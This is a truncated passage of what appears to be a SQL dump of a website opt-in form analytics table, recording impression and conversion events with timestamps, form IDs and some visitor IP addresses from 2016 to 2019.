04:20:11','imp','optin_2','fb084be2ed','162.158.69.47','184',0),(35,'2016-12-13 04:46:08','imp','optin_1','2','162.158.69.47','-1',0),(36,'2016-12-13 04:46:09','imp','optin_1','2','162.158.69.47','-1',0),(37,'2016-12-13 08:00:35','imp','optin_1','2','162.158.69.47','76',0),(38,'2016-12-13 08:00:37','imp','optin_1','2','162.158.69.47','76',0),(39,'2016-12-13 08:30:58','imp','optin_2','fb084be2ed','162.158.69.47','80',0),(40,'2016-12-13 09:57:12','imp','optin_2','fb084be2ed','162.158.69.47','67',0),(41,'2016-12-13 09:57:14','imp','optin_2','fb084be2ed','162.158.69.47','67',0),(42,'2016-12-13 10:07:29','imp','optin_2','fb084be2ed','162.158.69.47','-1',0),(43,'2016-12-13 10:22:58','imp','optin_2','fb084be2ed','162.158.69.47','309',0),(44,'2016-12-13 10:38:13','imp','optin_1','2','162.158.69.47','0',0),(45,'2016-12-13 11:03:47','imp','optin_1','2','162.158.69.47','80',0),(46,'2018-05-14 16:33:00','imp','optin_8','11','165.255.122.237','-1',0),(47,'2018-05-14 16:33:33','imp','optin_8','11','165.255.122.237','-1',0),(48,'2018-05-14 16:33:56','imp','optin_8','11','165.255.122.237','-1',0),(49,'2018-05-14 17:14:28','imp','optin_8','11','66.249.65.122','-1',0),(50,'2018-05-14 18:36:53','imp','optin_8','11','66.249.65.121','-1',0),(51,'2018-05-15 05:08:11','imp','optin_8','11','66.249.65.121','-1',0),(52,'2018-05-15 11:23:45','imp','optin_8','11','66.249.65.121','-1',0),(53,'2018-05-15 12:39:30','imp','optin_8','11','105.22.34.66','-1',0),(54,'2018-05-16 08:00:38','imp','optin_8','11','105.22.34.66','-1',0),(55,'2018-05-18 08:03:08','imp','optin_8','11','105.22.34.66','-1',0),(56,'2018-05-20 06:15:41','imp','optin_8','11','165.255.59.98','-1',0),(57,'2018-05-20 07:33:31','imp','optin_8','11','165.255.59.98','-1',0),(58,'2018-05-22 09:27:28','imp','optin_8','11','105.22.34.66','-1',0),(59,'2018-05-24 08:09:07','imp','optin_8','11','66.249.64.89','-1',0),(60,'2018-05-24 13:06:12','imp','optin_8','11','41.208.217.152','-1',0),(61,'2018-05-24 18:49:15','imp','optin_8','11','66.249.64.24','-1',0),(62,'2018-05-25 03:38:12','imp','optin_8','11','66.249.64.91','-1',0),(63,'2018-05-26 20:35:20','imp','optin_8','11','66.249.66.134','-1',0),(64,'2018-05-27 09:39:49','imp','optin_8','11','66.249.73.157','-1',0),(65,'2018-05-27 11:34:36','imp','optin_8','11','66.249.73.156','-1',0),(66,'2018-05-27 22:22:05','imp','optin_8','11','66.249.73.154','-1',0),(67,'2018-05-28 00:29:30','imp','optin_8','11','66.249.73.155','-1',0),(68,'2018-05-28 06:21:10','imp','optin_8','11','66.249.64.90','-1',0),(69,'2018-05-28 20:44:02','imp','optin_8','11','41.13.14.164','-1',0),(70,'2018-06-13 09:46:08','imp','optin_8','11','','-1',0),(71,'2018-06-15 11:26:18','imp','optin_8','11','','72',0),(72,'2018-06-15 11:30:24','imp','optin_8','11','','67',0),(73,'2018-06-15 11:32:43','imp','optin_8','11','','69',0),(74,'2018-06-15 18:30:36','imp','optin_8','11','','65',0),(75,'2018-06-15 18:30:59','imp','optin_8','11','','67',0),(76,'2018-06-15 18:31:11','imp','optin_8','11','','70',0),(77,'2018-06-15 18:31:16','imp','optin_8','11','','68',0),(78,'2018-06-15 18:31:18','imp','optin_8','11','','69',0),(79,'2018-06-15 18:31:20','imp','optin_8','11','','67',0),(80,'2018-06-16 05:39:28','imp','optin_8','11','','70',0),(81,'2018-06-17 11:08:52','imp','optin_8','11','','69',0),(82,'2018-06-17 14:08:40','imp','optin_8','11','','70',0),(83,'2018-06-18 00:34:26','imp','optin_8','11','','68',0),(84,'2018-06-18 01:16:26','imp','optin_8','11','','67',0),(85,'2018-06-22 20:21:10','imp','optin_8','11','','70',0),(86,'2018-06-22 20:24:44','imp','optin_8','11','','67',0),(87,'2018-06-22 20:26:55','imp','optin_8','11','','68',0),(88,'2018-06-22 20:27:05','imp','optin_8','11','','69',0),(89,'2018-06-22 20:29:42','imp','optin_8','11','','65',0),(90,'2018-06-22 20:32:08','imp','optin_8','11','','72',0),(91,'2018-06-23 08:01:17','imp','optin_8','11','','-1',0),(92,'2018-06-28 17:41:51','imp','optin_8','11','','-1',0),(93,'2018-06-29 04:05:01','imp','optin_8','11','','-1',0),(94,'2018-07-01 07:26:35','imp','optin_8','11','','-1',0),(95,'2018-07-03 09:49:59','imp','optin_8','11','','-1',0),(96,'2018-07-03 21:50:52','imp','optin_8','11','','-1',0),(97,'2018-07-04 03:51:23','imp','optin_8','11','','-1',0),(98,'2018-07-04 19:34:18','imp','optin_8','11','','-1',0),(99,'2018-07-05 13:26:32','imp','optin_8','11','','-1',0),(100,'2018-07-10 12:08:34','imp','optin_8','11','','-1',0),(101,'2018-07-11 15:53:25','imp','optin_8','11','','69',0),(102,'2018-07-15 08:41:14','imp','optin_8','11','','-1',0),(103,'2018-07-18 08:08:01','imp','optin_8','11','','-1',0),(104,'2018-07-18 11:21:55','imp','optin_8','11','','-1',0),(105,'2018-07-18 15:57:56','imp','optin_8','11','','-1',0),(106,'2018-07-23 13:06:30','imp','optin_8','11','','-1',0),(107,'2018-07-23 17:22:16','imp','optin_8','11','','68',0),(108,'2018-07-27 15:00:04','imp','optin_8','11','','-1',0),(109,'2018-07-28 18:50:13','imp','optin_8','11','','-1',0),(110,'2018-07-30 19:04:52','imp','optin_8','11','','-1',0),(111,'2018-08-01 06:12:26','imp','optin_8','11','','-1',0),(112,'2018-08-07 22:37:27','imp','optin_8','11','','-1',0),(113,'2018-08-08 00:30:50','imp','optin_8','11','','-1',0),(114,'2018-08-08 02:06:39','imp','optin_8','11','','69',0),(115,'2018-08-12 13:56:17','imp','optin_8','11','','-1',0),(116,'2018-08-16 12:22:04','imp','optin_8','11','','65',0),(117,'2018-08-17 09:15:28','imp','optin_8','11','','67',0),(118,'2018-08-18 04:50:24','imp','optin_8','11','','-1',0),(119,'2018-08-19 07:35:42','imp','optin_8','11','','-1',0),(120,'2018-08-20 08:05:44','imp','optin_8','11','','70',0),(121,'2018-08-21 07:05:30','imp','optin_8','11','','-1',0),(122,'2018-08-22 21:34:55','imp','optin_8','11','','65',0),(123,'2018-08-24 08:26:57','imp','optin_8','11','','68',0),(124,'2018-08-24 09:10:03','imp','optin_8','11','','-1',0),(125,'2018-08-24 09:57:25','imp','optin_8','11','','69',0),(126,'2018-08-24 10:40:37','imp','optin_8','11','','67',0),(127,'2018-08-24 10:49:28','imp','optin_8','11','','70',0),(128,'2018-08-24 16:57:18','imp','optin_8','11','','-1',0),(129,'2018-08-24 17:36:57','imp','optin_8','11','','-1',0),(130,'2018-08-25 01:32:14','imp','optin_8','11','','72',0),(131,'2018-08-25 11:13:02','imp','optin_8','11','','-1',0),(132,'2018-08-25 16:56:59','imp','optin_8','11','','68',0),(133,'2018-08-28 19:18:32','imp','optin_8','11','','-1',0),(134,'2018-08-29 06:52:22','imp','optin_8','11','','-1',0),(135,'2018-08-29 21:18:10','imp','optin_8','11','','-1',0),(136,'2018-09-03 22:40:29','imp','optin_8','11','','-1',0),(137,'2018-09-04 16:31:29','imp','optin_8','11','','-1',0),(138,'2018-09-05 18:01:05','imp','optin_8','11','','-1',0),(139,'2018-09-10 11:10:27','imp','optin_8','11','','-1',0),(140,'2018-09-12 22:28:29','imp','optin_8','11','','-1',0),(141,'2018-09-16 04:58:15','imp','optin_8','11','','-1',0),(142,'2018-09-17 13:36:49','imp','optin_8','11','','-1',0),(143,'2018-09-21 15:48:29','con','optin_8','activecampaign_11','','-1',0),(144,'2018-09-21 21:40:40','imp','optin_8','11','','-1',0),(145,'2018-09-27 16:15:14','imp','optin_8','11','','-1',0),(146,'2018-09-28 05:46:30','imp','optin_8','11','','67',0),(147,'2018-09-29 04:04:03','imp','optin_8','11','','-1',0),(148,'2018-09-29 06:34:56','imp','optin_8','11','','67',0),(149,'2018-09-29 15:20:43','imp','optin_8','11','','-1',0),(150,'2018-09-30 20:00:35','imp','optin_8','11','','-1',0),(151,'2018-09-30 20:00:39','imp','optin_8','11','','-1',0),(152,'2018-10-02 19:58:22','imp','optin_8','11','','69',0),(153,'2018-10-02 20:28:41','imp','optin_8','11','','-1',0),(154,'2018-10-02 23:49:30','imp','optin_8','11','','70',0),(155,'2018-10-03 00:08:43','imp','optin_8','11','','68',0),(156,'2018-10-03 07:18:42','imp','optin_8','11','','-1',0),(157,'2018-10-03 10:20:03','imp','optin_8','11','','-1',0),(158,'2018-10-06 20:57:44','imp','optin_8','11','','-1',0),(159,'2018-10-06 23:49:16','imp','optin_8','11','','-1',0),(160,'2018-10-07 08:59:04','imp','optin_8','11','','65',0),(161,'2018-10-07 17:31:22','imp','optin_8','11','','-1',0),(162,'2018-10-07 18:00:03','imp','optin_8','11','','-1',0),(163,'2018-10-07 22:22:19','imp','optin_8','11','','65',0),(164,'2018-10-08 02:41:56','imp','optin_8','11','','-1',0),(165,'2018-10-08 03:01:43','imp','optin_8','11','','-1',0),(166,'2018-10-08 14:46:32','imp','optin_8','11','','-1',0),(167,'2018-10-08 20:46:32','imp','optin_8','11','','-1',0),(168,'2018-10-09 01:50:11','imp','optin_8','11','','-1',0),(169,'2018-10-09 03:02:14','imp','optin_8','11','','-1',0),(170,'2018-10-09 03:50:14','imp','optin_8','11','','68',0),(171,'2018-10-11 09:40:38','imp','optin_8','11','','-1',0),(172,'2018-10-15 11:28:25','imp','optin_8','11','','-1',0),(173,'2018-10-16 01:52:19','imp','optin_8','11','','-1',0),(174,'2018-10-21 05:34:25','imp','optin_8','11','','-1',0),(175,'2018-10-21 22:33:14','imp','optin_8','11','','-1',0),(176,'2018-10-25 01:12:58','imp','optin_8','11','','-1',0),(177,'2018-10-25 13:04:58','imp','optin_8','11','','-1',0),(178,'2018-10-27 16:40:46','imp','optin_8','11','','70',0),(179,'2018-10-30 05:05:53','imp','optin_8','11','','-1',0),(180,'2018-10-30 12:36:48','imp','optin_8','11','','69',0),(181,'2018-10-30 14:37:08','imp','optin_8','11','','-1',0),(182,'2018-10-30 17:38:13','imp','optin_8','11','','68',0),(183,'2018-10-30 18:31:18','imp','optin_8','11','','-1',0),(184,'2018-10-30 20:09:32','imp','optin_8','11','','-1',0),(185,'2018-10-31 03:41:13','imp','optin_8','11','','-1',0),(186,'2018-10-31 05:41:50','imp','optin_8','11','','-1',0),(187,'2018-10-31 10:42:23','imp','optin_8','11','','69',0),(188,'2018-10-31 12:42:51','imp','optin_8','11','','-1',0),(189,'2018-10-31 14:12:45','imp','optin_8','11','','-1',0),(190,'2018-10-31 22:17:21','imp','optin_8','11','','-1',0),(191,'2018-10-31 22:47:24','imp','optin_8','11','','-1',0),(192,'2018-11-01 05:56:30','imp','optin_8','11','','68',0),(193,'2018-11-01 07:07:08','imp','optin_8','11','','69',0),(194,'2018-11-01 07:18:17','imp','optin_8','11','','-1',0),(195,'2018-11-01 08:17:53','imp','optin_8','11','','-1',0),(196,'2018-11-02 00:40:22','imp','optin_8','11','','-1',0),(197,'2018-11-02 01:00:53','imp','optin_8','11','','-1',0),(198,'2018-11-02 03:35:18','imp','optin_8','11','','-1',0),(199,'2018-11-02 08:40:03','imp','optin_8','11','','-1',0),(200,'2018-11-02 14:30:43','imp','optin_8','11','','-1',0),(201,'2018-11-02 14:51:12','imp','optin_8','11','','-1',0),(202,'2018-11-02 17:12:48','imp','optin_8','11','','-1',0),(203,'2018-11-02 17:23:42','imp','optin_8','11','','-1',0),(204,'2018-11-03 02:47:30','imp','optin_8','11','','-1',0),(205,'2018-11-03 02:55:29','imp','optin_8','11','','-1',0),(206,'2018-11-03 03:51:30','imp','optin_8','11','','-1',0),(207,'2018-11-03 14:21:45','imp','optin_8','11','','-1',0),(208,'2018-11-03 16:52:14','imp','optin_8','11','','-1',0),(209,'2018-11-04 22:21:25','imp','optin_8','11','','-1',0),(210,'2018-11-08 01:56:16','imp','optin_8','11','','67',0),(211,'2018-11-08 03:46:09','imp','optin_8','11','','-1',0),(212,'2018-11-08 10:50:47','imp','optin_8','11','','-1',0),(213,'2018-11-08 11:23:46','imp','optin_8','11','','-1',0),(214,'2018-11-08 11:43:32','imp','optin_8','11','','-1',0),(215,'2018-11-08 17:46:30','imp','optin_8','11','','70',0),(216,'2018-11-08 21:36:04','imp','optin_8','11','','-1',0),(217,'2018-11-08 22:58:53','imp','optin_8','11','','-1',0),(218,'2018-11-10 12:53:32','imp','optin_8','11','','-1',0),(219,'2018-11-10 15:04:25','imp','optin_8','11','','-1',0),(220,'2018-11-11 03:01:17','imp','optin_8','11','','-1',0),(221,'2018-11-11 05:22:17','imp','optin_8','11','','-1',0),(222,'2018-11-11 12:04:20','imp','optin_8','11','','-1',0),(223,'2018-11-11 14:56:05','imp','optin_8','11','','-1',0),(224,'2018-11-11 15:45:37','imp','optin_8','11','','-1',0),(225,'2018-11-11 21:17:01','imp','optin_8','11','','-1',0),(226,'2018-11-13 15:43:23','imp','optin_8','11','','-1',0),(227,'2018-11-13 15:51:18','con','optin_8','activecampaign_11','','-1',0),(228,'2018-11-13 16:57:42','imp','optin_8','11','','-1',0),(229,'2018-11-13 18:07:25','imp','optin_8','11','','-1',0),(230,'2018-11-13 22:24:19','imp','optin_8','11','','-1',0),(231,'2018-11-14 13:30:04','imp','optin_8','11','','-1',0),(232,'2018-11-14 13:50:03','imp','optin_8','11','','-1',0),(233,'2018-11-14 14:00:48','imp','optin_8','11','','-1',0),(234,'2018-11-14 15:52:07','imp','optin_8','11','','-1',0),(235,'2018-11-15 01:58:17','imp','optin_8','11','','-1',0),(236,'2018-11-15 02:13:53','imp','optin_8','11','','-1',0),(237,'2018-11-15 09:23:43','imp','optin_8','11','','-1',0),(238,'2018-11-15 17:36:13','imp','optin_8','11','','-1',0),(239,'2018-11-15 17:46:39','imp','optin_8','11','','-1',0),(240,'2018-11-15 18:16:41','imp','optin_8','11','','-1',0),(241,'2018-11-16 02:49:36','imp','optin_8','11','','-1',0),(242,'2018-11-16 02:59:40','imp','optin_8','11','','-1',0),(243,'2018-11-16 03:19:51','imp','optin_8','11','','-1',0),(244,'2018-11-16 04:20:30','imp','optin_8','11','','-1',0),(245,'2018-11-16 12:32:50','imp','optin_8','11','','-1',0),(246,'2018-11-17 11:20:45','imp','optin_8','11','','-1',0),(247,'2018-11-17 11:30:54','imp','optin_8','11','','-1',0),(248,'2018-11-17 13:41:12','imp','optin_8','11','','-1',0),(249,'2018-11-19 06:34:12','imp','optin_8','11','','-1',0),(250,'2018-11-22 00:41:59','imp','optin_8','11','','-1',0),(251,'2018-11-22 09:03:21','imp','optin_8','11','','-1',0),(252,'2018-11-22 12:15:17','imp','optin_8','11','','-1',0),(253,'2018-11-22 12:34:59','imp','optin_8','11','','-1',0),(254,'2018-11-22 22:07:14','imp','optin_8','11','','-1',0),(255,'2018-11-22 23:47:53','imp','optin_8','11','','-1',0),(256,'2018-11-23 06:07:54','imp','optin_8','11','','-1',0),(257,'2018-11-23 06:39:42','imp','optin_8','11','','68',0),(258,'2018-11-23 06:40:44','imp','optin_8','11','','69',0),(259,'2018-11-23 11:31:19','imp','optin_8','11','','-1',0),(260,'2018-11-23 11:32:24','imp','optin_8','11','','-1',0),(261,'2018-11-23 16:06:18','imp','optin_8','11','','-1',0),(262,'2018-11-23 18:22:07','imp','optin_8','11','','68',0),(263,'2018-11-23 20:27:14','imp','optin_8','11','','69',0),(264,'2018-11-23 21:34:15','imp','optin_8','11','','-1',0),(265,'2018-11-23 22:57:06','imp','optin_8','11','','-1',0),(266,'2018-11-24 02:01:30','imp','optin_8','11','','-1',0),(267,'2018-11-24 02:29:05','imp','optin_8','11','','67',0),(268,'2018-11-24 03:58:33','imp','optin_8','11','','67',0),(269,'2018-11-24 06:26:35','imp','optin_8','11','','65',0),(270,'2018-11-24 11:26:54','imp','optin_8','11','','-1',0),(271,'2018-11-25 23:27:14','imp','optin_8','11','','65',0),(272,'2018-11-26 00:27:51','imp','optin_8','11','','-1',0),(273,'2018-11-26 06:29:43','imp','optin_8','11','','-1',0),(274,'2018-11-26 06:39:19','imp','optin_8','11','','-1',0),(275,'2018-11-26 09:10:52','imp','optin_8','11','','-1',0),(276,'2018-11-26 15:22:38','imp','optin_8','11','','-1',0),(277,'2018-11-26 20:52:52','imp','optin_8','11','','-1',0),(278,'2018-11-27 13:28:00','imp','optin_8','11','','-1',0),(279,'2018-11-27 16:59:22','imp','optin_8','11','','-1',0),(280,'2018-11-30 09:55:16','imp','optin_8','11','','70',0),(281,'2018-11-30 17:58:44','imp','optin_8','11','','-1',0),(282,'2018-12-01 02:23:27','imp','optin_8','11','','-1',0),(283,'2018-12-01 04:13:32','imp','optin_8','11','','-1',0),(284,'2018-12-01 05:23:50','imp','optin_8','11','','-1',0),(285,'2018-12-01 14:05:40','imp','optin_8','11','','-1',0),(286,'2018-12-01 14:56:22','imp','optin_8','11','','-1',0),(287,'2018-12-01 16:59:56','imp','optin_8','11','','-1',0),(288,'2018-12-01 20:18:46','imp','optin_8','11','','70',0),(289,'2018-12-01 23:13:14','imp','optin_8','11','','-1',0),(290,'2018-12-02 01:30:10','imp','optin_8','11','','-1',0),(291,'2018-12-02 06:21:39','imp','optin_8','11','','70',0),(292,'2018-12-02 09:10:33','imp','optin_8','11','','-1',0),(293,'2018-12-02 10:53:06','imp','optin_8','11','','-1',0),(294,'2018-12-02 17:30:19','imp','optin_8','11','','-1',0),(295,'2018-12-02 17:40:38','imp','optin_8','11','','-1',0),(296,'2018-12-03 04:14:13','imp','optin_8','11','','-1',0),(297,'2018-12-03 04:14:27','imp','optin_8','11','','-1',0),(298,'2018-12-03 04:18:45','imp','optin_8','11','','70',0),(299,'2018-12-03 07:19:21','imp','optin_8','11','','-1',0),(300,'2018-12-03 13:36:05','imp','optin_8','11','','-1',0),(301,'2018-12-04 02:09:12','imp','optin_8','11','','-1',0),(302,'2018-12-04 13:07:10','imp','optin_8','11','','-1',0),(303,'2018-12-04 14:32:11','imp','optin_8','11','','-1',0),(304,'2018-12-04 23:42:37','imp','optin_8','11','','-1',0),(305,'2018-12-05 00:10:48','imp','optin_8','11','','-1',0),(306,'2018-12-05 01:23:32','imp','optin_8','11','','-1',0),(307,'2018-12-05 03:23:24','imp','optin_8','11','','65',0),(308,'2018-12-05 13:34:36','imp','optin_8','11','','68',0),(309,'2018-12-05 13:40:25','imp','optin_8','11','','68',0),(310,'2018-12-06 13:43:07','imp','optin_8','11','','67',0),(311,'2018-12-06 13:43:49','imp','optin_8','11','','67',0),(312,'2018-12-06 20:48:47','imp','optin_8','11','','-1',0),(313,'2018-12-06 20:49:02','imp','optin_8','11','','-1',0),(314,'2018-12-06 21:18:23','imp','optin_8','11','','-1',0),(315,'2018-12-07 05:56:46','imp','optin_8','11','','-1',0),(316,'2018-12-07 05:56:52','imp','optin_8','11','','-1',0),(317,'2018-12-07 06:30:18','imp','optin_8','11','','-1',0),(318,'2018-12-07 11:40:00','imp','optin_8','11','','69',0),(319,'2018-12-07 12:40:18','imp','optin_8','11','','68',0),(320,'2018-12-07 13:49:57','imp','optin_8','11','','68',0),(321,'2018-12-07 14:39:42','imp','optin_8','11','','-1',0),(322,'2018-12-07 14:39:48','imp','optin_8','11','','-1',0),(323,'2018-12-07 20:20:53','imp','optin_8','11','','69',0),(324,'2018-12-07 20:32:44','imp','optin_8','11','','69',0),(325,'2018-12-08 22:14:05','imp','optin_8','11','','-1',0),(326,'2018-12-10 18:30:28','imp','optin_8','11','','-1',0),(327,'2018-12-11 05:10:45','imp','optin_8','11','','-1',0),(328,'2018-12-11 08:35:26','imp','optin_8','11','','-1',0),(329,'2018-12-11 20:10:11','imp','optin_8','11','','69',0),(330,'2018-12-11 20:35:05','imp','optin_8','11','','68',0),(331,'2018-12-12 21:10:41','imp','optin_8','11','','-1',0),(332,'2018-12-13 17:40:25','imp','optin_8','11','','-1',0),(333,'2018-12-14 03:21:23','imp','optin_8','11','','-1',0),(334,'2018-12-14 05:00:59','imp','optin_8','11','','67',0),(335,'2018-12-14 13:23:58','imp','optin_8','11','','-1',0),(336,'2018-12-14 19:05:56','imp','optin_8','11','','-1',0),(337,'2018-12-14 20:11:26','imp','optin_8','11','','-1',0),(338,'2018-12-15 06:05:39','imp','optin_8','11','','-1',0),(339,'2018-12-15 13:46:49','imp','optin_8','11','','67',0),(340,'2018-12-16 07:04:01','imp','optin_8','11','','-1',0),(341,'2018-12-19 23:19:20','imp','optin_8','11','','-1',0),(342,'2018-12-20 03:29:03','imp','optin_8','11','','-1',0),(343,'2018-12-20 03:59:01','imp','optin_8','11','','-1',0),(344,'2018-12-20 08:31:56','imp','optin_8','11','','-1',0),(345,'2018-12-20 14:24:27','imp','optin_8','11','','-1',0),(346,'2018-12-20 20:06:03','imp','optin_8','11','','-1',0),(347,'2018-12-21 04:48:45','imp','optin_8','11','','-1',0),(348,'2018-12-21 06:40:45','imp','optin_8','11','','72',0),(349,'2018-12-21 06:44:46','imp','optin_8','11','','69',0),(350,'2018-12-21 08:59:59','imp','optin_8','11','','-1',0),(351,'2018-12-21 15:35:19','imp','optin_8','11','','-1',0),(352,'2018-12-21 20:39:08','imp','optin_8','11','','-1',0),(353,'2018-12-22 01:29:55','imp','optin_8','11','','-1',0),(354,'2018-12-22 01:44:27','imp','optin_8','11','','-1',0),(355,'2018-12-22 09:37:11','imp','optin_8','11','','-1',0),(356,'2018-12-22 09:57:27','imp','optin_8','11','','-1',0),(357,'2018-12-23 15:04:49','imp','optin_8','11','','65',0),(358,'2018-12-25 01:18:49','imp','optin_8','11','','-1',0),(359,'2018-12-25 18:34:21','imp','optin_8','11','','-1',0),(360,'2018-12-25 22:24:52','imp','optin_8','11','','-1',0),(361,'2018-12-26 11:00:25','imp','optin_8','11','','-1',0),(362,'2018-12-26 18:02:33','imp','optin_8','11','','-1',0),(363,'2018-12-27 12:19:46','imp','optin_8','11','','-1',0),(364,'2018-12-28 07:04:20','imp','optin_8','11','','-1',0),(365,'2018-12-28 13:57:37','imp','optin_8','11','','-1',0),(366,'2018-12-28 17:17:51','imp','optin_8','11','','-1',0),(367,'2018-12-28 23:20:24','imp','optin_8','11','','-1',0),(368,'2018-12-29 02:51:15','imp','optin_8','11','','-1',0),(369,'2018-12-29 04:21:41','imp','optin_8','11','','72',0),(370,'2018-12-29 08:54:40','imp','optin_8','11','','-1',0),(371,'2018-12-29 19:43:37','imp','optin_8','11','','-1',0),(372,'2018-12-29 21:33:00','imp','optin_8','11','','-1',0),(373,'2018-12-30 01:30:42','imp','optin_8','11','','72',0),(374,'2018-12-30 03:41:19','imp','optin_8','11','','-1',0),(375,'2018-12-30 06:12:12','imp','optin_8','11','','-1',0),(376,'2018-12-30 16:16:07','imp','optin_8','11','','-1',0),(377,'2018-12-31 14:37:48','imp','optin_8','11','','-1',0),(378,'2019-01-02 16:23:22','imp','optin_8','11','','-1',0),(379,'2019-01-02 20:04:07','imp','optin_8','11','','-1',0),(380,'2019-01-03 02:47:14','imp','optin_8','11','','70',0),(381,'2019-01-03 09:21:15','imp','optin_8','11','','-1',0),(382,'2019-01-03 16:16:17','imp','optin_8','11','','-1',0),(383,'2019-01-07 06:29:32','imp','optin_8','11','','-1',0),(384,'2019-01-07 23:33:14','imp','optin_8','11','','-1',0),(385,'2019-01-08 06:24:57','imp','optin_8','11','','-1',0),(386,'2019-01-08 08:44:00','imp','optin_8','11','','-1',0),(387,'2019-01-08 11:44:11','imp','optin_8','11','','72',0),(388,'2019-01-08 14:15:04','imp','optin_8','11','','68',0),(389,'2019-01-08 14:24:58','imp','optin_8','11','','69',0),(390,'2019-01-08 21:48:31','imp','optin_8','11','','72',0),(391,'2019-01-08 23:58:58','imp','optin_8','11','','-1',0),(392,'2019-01-09 01:29:10','imp','optin_8','11','','-1',0),(393,'2019-01-09 02:09:37','imp','optin_8','11','','68',0),(394,'2019-01-09 13:39:49','imp','optin_8','11','','-1',0),(395,'2019-01-09 23:12:01','imp','optin_8','11','','-1',0),(396,'2019-01-12 23:06:36','imp','optin_8','11','','-1',0),(397,'2019-01-13 06:36:41','imp','optin_8','11','','-1',0),(398,'2019-01-13 12:46:33','imp','optin_8','11','','-1',0),(399,'2019-01-13 19:58:05','imp','optin_8','11','','-1',0),(400,'2019-01-14 09:05:55','imp','optin_8','11','','-1',0),(401,'2019-01-19 09:56:36','imp','optin_8','11','','-1',0),(402,'2019-01-19 12:50:47','imp','optin_8','11','','-1',0),(403,'2019-01-19 20:29:49','imp','optin_8','11','','72',0),(404,'2019-01-19 23:11:27','imp','optin_8','11','','68',0),(405,'2019-01-19 23:31:17','imp','optin_8','11','','69',0),(406,'2019-01-20 15:40:26','imp','optin_8','11','','-1',0),(407,'2019-01-20 16:20:14','imp','optin_8','11','','72',0),(408,'2019-01-20 19:29:53','imp','optin_8','11','','65',0),(409,'2019-01-20 19:50:00','imp','optin_8','11','','70',0),(410,'2019-01-20 20:00:36','imp','optin_8','11','','68',0),(411,'2019-01-20 20:10:32','imp','optin_8','11','','69',0),(412,'2019-01-20 20:10:34','imp','optin_8','11','','68',0),(413,'2019-01-20 20:50:46','imp','optin_8','11','','69',0),(414,'2019-01-20 21:50:59','imp','optin_8','11','','67',0),(415,'2019-01-20 22:01:15','imp','optin_8','11','','67',0),(416,'2019-01-20 22:31:14','imp','optin_8','11','','69',0),(417,'2019-01-22 01:59:45','imp','optin_8','11','','-1',0),(418,'2019-01-22 02:19:45','imp','optin_8','11','','-1',0),(419,'2019-01-22 02:39:52','imp','optin_8','11','','-1',0),(420,'2019-01-22 03:09:59','imp','optin_8','11','','-1',0),(421,'2019-01-22 16:53:08','imp','optin_8','11','','72',0),(422,'2019-01-23 02:26:49','imp','optin_8','11','','72',0),(423,'2019-01-23 21:48:14','imp','optin_8','11','','-1',0),(424,'2019-01-25 10:01:28','imp','optin_8','11','','-1',0),(425,'2019-01-25 11:34:09','imp','optin_8','11','','-1',0),(426,'2019-01-25 12:54:46','imp','optin_8','11','','-1',0),(427,'2019-01-25 19:03:37','imp','optin_8','11','','68',0),(428,'2019-01-25 20:14:38','imp','optin_8','11','','69',0),(429,'2019-01-28 09:49:45','imp','optin_8','11','','-1',0),(430,'2019-01-28 18:01:19','imp','optin_8','11','','65',0),(431,'2019-01-29 02:02:59','imp','optin_8','11','','70',0),(432,'2019-01-29 04:10:59','imp','optin_8','11','','72',0),(433,'2019-01-29 09:01:15','imp','optin_8','11','','69',0),(434,'2019-01-29 13:54:08','imp','optin_8','11','','-1',0),(435,'2019-01-29 14:43:51','imp','optin_8','11','','-1',0),(436,'2019-01-29 15:04:31','imp','optin_8','11','','-1',0),(437,'2019-01-29 18:26:54','imp','optin_8','11','','72',0),(438,'2019-01-29 20:02:52','imp','optin_8','11','','-1',0),(439,'2019-01-29 23:50:53','imp','optin_8','11','','-1',0),(440,'2019-01-30 08:35:52','imp','optin_8','11','','-1',0),(441,'2019-01-30 21:26:10','imp','optin_8','11','','-1',0),(442,'2019-01-30 23:06:51','imp','optin_8','11','','-1',0),(443,'2019-01-30 23:46:45','imp','optin_8','11','','-1',0),(444,'2019-01-31 02:28:47','imp','optin_8','11','','-1',0),(445,'2019-02-01 18:23:03','imp','optin_8','11','','70',0),(446,'2019-02-02 23:04:53','imp','optin_8','11','','-1',0),(447,'2019-02-03 00:55:42','imp','optin_8','11','','-1',0),(448,'2019-02-03 02:05:49','imp','optin_8','11','','-1',0),(449,'2019-02-03 15:50:42','imp','optin_8','11','','-1',0),(450,'2019-02-03 19:26:25','imp','optin_8','11','','-1',0),(451,'2019-02-04 05:30:39','imp','optin_8','11','','-1',0),(452,'2019-02-04 11:48:16','imp','optin_8','11','','67',0),(453,'2019-02-05 03:19:32','imp','optin_8','11','','67',0),(454,'2019-02-05 17:29:01','imp','optin_8','11','','-1',0),(455,'2019-02-05 23:31:38','imp','optin_8','11','','-1',0),(456,'2019-02-06 01:12:52','imp','optin_8','11','','-1',0),(457,'2019-02-06 04:05:05','imp','optin_8','11','','-1',0),(458,'2019-02-06 04:53:43','imp','optin_8','11','','-1',0),(459,'2019-02-06 23:35:52','imp','optin_8','11','','-1',0),(460,'2019-02-08 14:47:26','imp','optin_8','11','','-1',0),(461,'2019-02-08 16:17:20','imp','optin_8','11','','-1',0),(462,'2019-02-09 02:31:51','imp','optin_8','11','','-1',0),(463,'2019-02-09 06:09:25','imp','optin_8','11','','-1',0),(464,'2019-02-09 09:03:17','imp','optin_8','11','','-1',0),(465,'2019-02-09 09:43:26','imp','optin_8','11','','-1',0),(466,'2019-02-09 18:33:10','imp','optin_8','11','','-1',0),(467,'2019-02-09 23:24:54','imp','optin_8','11','','-1',0),(468,'2019-02-10 04:27:11','imp','optin_8','11','','-1',0),(469,'2019-02-11 10:48:07','imp','optin_8','11','','-1',0),(470,'2019-02-11 17:58:31','imp','optin_8','11','','-1',0),(471,'2019-02-11 18:18:30','imp','optin_8','11','','-1',0),(472,'2019-02-11 18:58:57','imp','optin_8','11','','-1',0),(473,'2019-02-12 04:46:05','imp','optin_8','11','','-1',0),(474,'2019-02-12 05:06:17','imp','optin_8','11','','-1',0),(475,'2019-02-12 06:16:37','imp','optin_8','11','','-1',0),(476,'2019-02-12 06:26:41','imp','optin_8','11','','-1',0),(477,'2019-02-12 07:56:58','imp','optin_8','11','','-1',0),(478,'2019-02-12 13:48:11','imp','optin_8','11','','-1',0),(479,'2019-02-12 14:38:30','imp','optin_8','11','','72',0),(480,'2019-02-12 17:29:48','imp','optin_8','11','','-1',0),(481,'2019-02-13 04:14:10','imp','optin_8','11','','-1',0),(482,'2019-02-13 07:45:46','imp','optin_8','11','','-1',0),(483,'2019-02-14 